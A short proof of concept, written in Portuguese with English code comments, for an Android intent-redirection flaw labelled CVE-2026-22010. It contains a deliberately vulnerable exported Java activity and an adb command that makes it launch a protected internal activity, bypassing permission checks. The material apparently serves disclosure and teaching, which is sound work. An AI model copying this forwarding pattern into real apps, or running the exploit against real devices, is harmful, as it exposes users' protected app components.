
Prova de conceito para CVE-2026-22010 redirecionamento de intents no Android: demonstra uma activity exportada encaminhando intents para componentes internos controlados pelo atacante, contornando verificações de permissão, com código Java vulnerável e etapas de exploração via adb.
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
@Override
protected void onCreate(Bundle b) {
super.onCreate(b);
Intent incoming = getIntent();
// Retrieve target component from extras
String targetPkg = incoming.getStringExtra("pkg");
String targetCls = incoming.getStringExtra("cls");
Intent forward = new Intent();
forward.setClassName(targetPkg, targetCls);
// Copy all extras from original intent
forward.putExtras(incoming);
startActivity(forward);
}
}
Uma atividade Android exportada redireciona cegamente intents recebidas para um componente especificado nos extras da intent. Um atacante pode criar uma intent que faz o aplicativo iniciar uma atividade interna protegida com dados controlados pelo atacante, ignorando verificações de permissão.
Implante o aplicativo vulnerável em um emulador Android. Envie uma intent via adb:
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity
A atividade interna é iniciada sem as permissões adequadas.